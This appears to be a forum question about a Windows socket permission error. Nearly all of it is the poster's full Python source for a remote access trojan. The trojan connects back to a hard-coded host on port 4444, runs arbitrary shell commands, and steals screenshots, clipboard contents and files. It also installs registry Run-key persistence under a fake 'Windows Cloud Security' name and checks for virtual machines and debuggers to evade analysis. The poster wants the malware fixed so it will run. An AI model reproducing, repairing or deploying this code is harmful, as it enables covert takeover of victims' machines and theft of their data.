# PermissionError: [WinError 10013] An attempt was made to access a socket in a way forbidden by its access permissions

Tags: python, python-3.x, sockets

Whenever I run my code it gives me "PermissionError: [WinError 10013] An attempt was made to access a socket in a way forbidden by its access permissions" error, it happened after many Python updates.

Here's the code:

```
#from tkinter import messagebox
#messagebox.showerror("Error", f"ResourceUnavailable: Program 'cmd.exe' failed to run: An error occurred trying to start process")
from PIL import ImageGrab
import socket
import base64
import os
import platform
import time
import random, string
import psutil
import subprocess
import winreg as reg
import shutil
import ctypes
from ctypes import windll
import sys
import threading
from pynput.mouse import Controller
global mouse_controller
global mouse_movement_counter
global mouse_movement
class evasiontechs:
    mouse_movement_counter = 2000
    mouse_controller = Controller()
    mousemovecount = 2000
    mouse_controller = Controller()
    def zpVXAIPnyaQaYr(): # evation techs
        vmproc1 = "vmsrvc.exe"
        vmproc2 = "vmusrvc.exe"
        vmproc3 = "vmtoolsd.exe"
        vmproc5 = "vboxtry.exe"
        vmproc6 = "df5serv.exe"
        vmproc7 = "vboxservice.exe"
        for proc in psutil.process_iter():
            try:
                if proc.name().lower() == vmproc1.lower() or proc.name().lower() == vmproc2.lower() or proc.name().lower() == vmproc3.lower() or proc.name().lower() == vmproc5.lower() or proc.name().lower() == vmproc6.lower() or proc.name().lower() == vmproc7.lower():
                    exit()
            except WindowsError:
                vmpath1 = os.path.exists(r"C:\\windows\system32\\drivers\\mci.sys")
                vmpath2 = os.path.exists(r"C:\\windows\system32\\drivers\\mhgfs.sys")
                vmpath3 = os.path.exists(r"C:\\windows\system32\\drivers\\mmouse.sys")
                vmpath4 = os.path.exists(r"C:\\windows\system32\\drivers\\mscsi.sys")
                vmpath5 = os.path.exists(r"C:\\windows\system32\\drivers\\musemouse.sys")
                vmpath6 = os.path.exists(r"C:\\windows\system32\\drivers\\mx_svga.sys")
                vmpath7 = os.path.exists(r"C:\\windows\system32\\drivers\\mxnet.sys")
                vmpath8 = os.path.exists(r"C:\\windows\system32\\drivers\\VBoxMouse.sys")
                if vmpath1 == True or vmpath2 == True or vmpath3 == True or vmpath4 == True or vmpath5 == True or vmpath6 == True or vmpath7 == True or vmpath8 == True:
                    exit()
    zpVXAIPnyaQaYr()
    def evation():
        mouse_movement()
        return True
        if not is_debug():
            return False
    def mouse_movement():
        counter = 0
        current_position = mouse_controller.position
        while counter < mouse_movement_counter:
            old_position = mouse_controller.position
            if current_position != old_position:
                current_position = old_position
                counter += 1
    def is_debug():
        try:
            return windll.kernel32.IsDebuggerPresent() != 0
        except Exception:
            return True
#letters = ''.join(random.choice(string.ascii_letters) for l in range(16))
#X = 0
#letters = time.sleep(X)
#letters
def zJnWJKrmzwZTAHJT(f_name, path):
    address=os.path.join(path, f_name)
    key = reg.HKEY_CURRENT_USER
    key_value = "Software\Microsoft\Windows\CurrentVersion\Run"
    open = reg.OpenKey(key, key_value, 0, reg.KEY_ALL_ACCESS)
    reg.SetValueEx(open, "Windows Cloud Security", 0, reg.REG_SZ, address)
    reg.CloseKey(open)
BUFFER_SIZE = 1024
def connection():
    try:
        clientHOST="10.0.0.7"
        clientPORT=4444
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        def TeZfZTttAYMjZZ():
            try:
                return ctypes.windll.shell32.IsUserAnAdmin()
            except:
                return False
        if TeZfZTttAYMjZZ():
            connection()
        else:
            ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1)
        if TeZfZTttAYMjZZ() == True:
            pass
        else:
            TeZfZTttAYMjZZ()
        if TeZfZTttAYMjZZ() == True:
            pass
        else:
            TeZfZTttAYMjZZ()
        s.connect((clientHOST, clientPORT))
        s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 10000, 3000))
        sys.setrecursionlimit(1500)
        while True:
            Handler_DATA = s.recv(BUFFER_SIZE).decode("utf-8")
            if Handler_DATA == "screenshot":
                screenshot = ImageGrab.grab()
                file = "xpvuNBYVvC.jpg"
                screenshot.save(file)
                f = open(file, 'rb')
                data=f.read()
                data=base64.b64encode(data)
                f.close()
                message = data
                s.send(data)
                time.sleep(1)
                os.remove(file)
            elif Handler_DATA == "restart":
                if platform.system() == "Windows":
                    os.system("shutdown -t 0 -r -f")
                else:
                    os.system("reboot")
            elif Handler_DATA == "shutdown":
                if platform.system() == "Windows":
                    os.system("shutdown /s /t 1")
                else:
                    os.system("shutdown now")
            elif Handler_DATA == "shell":
                    cwd = os.getcwd()
                    s.send(("dir:" + str(cwd)).encode('utf-8'))
                    while True:
                        try:
                            command = s.recv(2048).strip().decode('utf-8')
                            if 'terminate' in command:
                                break
                            elif 'clipboard' in command:
                                CF_TEXT = 1
                                kernel32 = ctypes.windll.kernel32
                                user32 = ctypes.windll.user32
                                kernel32.GlobalLock.argtypes = [ctypes.c_void_p]
                                kernel32.GlobalLock.restype = ctypes.c_void_p
                                kernel32.GlobalUnlock.argtypes = [ctypes.c_void_p]
                                user32.GetClipboardData.restype = ctypes.c_void_p
                                user32.OpenClipboard(0)
                                IsClipboardFormatAvailable = user32.IsClipboardFormatAvailable
                                GetClipboardData = user32.GetClipboardData
                                CloseClipboard = user32.CloseClipboard
                                try:
                                    if IsClipboardFormatAvailable(CF_TEXT):
                                        getClipboardData = GetClipboardData(CF_TEXT)
                                        getClipboardDataLoc = kernel32.GlobalLock(getClipboardData)
                                        text = ctypes.c_char_p(getClipboardDataLoc)
                                        value = text.value
                                        kernel32.GlobalUnlock(getClipboardDataLoc)
                                        s.send(str(value).encode("utf-8"))
                                    if IsClipboardFormatAvailable(CF_TEXT) == False:
                                        pass
                                finally:
                                    CloseClipboard()
                            elif command.startswith('grab'):
                                file_name = command[5:]
                                file_size = os.path.getsize(file_name)
                                s.send(file_name.encode('utf-8'))
                                s.recv(5120).decode('utf-8')
                                s.send(str(file_size).encode('utf-8'))
                                s.recv(5120).decode('utf-8')
                                with open(file_name, "rb") as file:
                                    c = 0
                                    start_time = time.time()
                                    while c < file_size:
                                        data = file.read(5120)
                                        if not (data):
                                            break
                                        s.sendall(data)
                                        c += len(data)
                                    end_time = time.time()
                            elif 'transfer' in command:
                                file_name = s.recv(5120).decode('utf-8')
                                file_size = s.recv(5120).decode('utf-8')
                                with open(file_name, "wb") as file:
                                    c = 0
                                    start_time = time.time()
                                    while c < int(file_size):
                                        data = s.recv(5120)
                                        if not (data):
                                            break
                                        file.write(data)
                                        c += len(data)
                                    end_time = time.time()
                            elif command.startswith('cd '):
                                dir = command[3:]
                                try:
                                    os.chdir(dir)
                                except:
                                    os.chdir(cwd)
                                cwd = os.getcwd()
                                s.send(("dir:" + str(cwd)).encode('utf-8'))
                            elif command.startswith('persistence'):
                                file_name = command[12:]
                                pth = os.getcwd()
                                try:
                                    zJnWJKrmzwZTAHJT(file_name, pth)
                                    s.send("Hooked".encode('utf-8'))
                                except Exception as e:
                                    s.send(str(e).encode('utf-8'))
                            else:
                                CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                                out = CMD.stdout.read()
                                err = CMD.stderr.read()
                                s.send(out)
                                s.send(err)
                                if (out == b'' and err == b''):
                                    s.send("Invalid".encode('utf-8'))
                        except Exception as e:
                            s.send(str(e).encode('utf-8'))
            elif Handler_DATA == "exit":
                s.close()
                exit()
    except socket.error:
        connection()
        if connection() == True:
            pass
        else:
            connection()
    except MemoryError:
        pass
    except SystemError:
        pass
def TCjgbxixqsdxEc():
    cpuChk = psutil.cpu_count(logical=False)
    if cpuChk == 1:
        exit()
    if cpuChk == 3:
        exit()
    else:
        connection()
TCjgbxixqsdxEc()
def PTYMEYUXBRwddE():
    avgDiskChk = shutil.disk_usage("/")
    div = (avgDiskChk // (2**30))
    if div == 59:
        exit()
    if div == 60:
        exit()
    if div == 65:
        exit()
    if div == 120:
        exit()
    if div == 119:
        exit()
    else:
        connection()
PTYMEYUXBRwddE()
connection()
```

I tried disabling Windows Defneder and Windows Firewall, even running it on an isolated VM doesn't help, and also running the code as administrator wont' help, I ran out of ideas...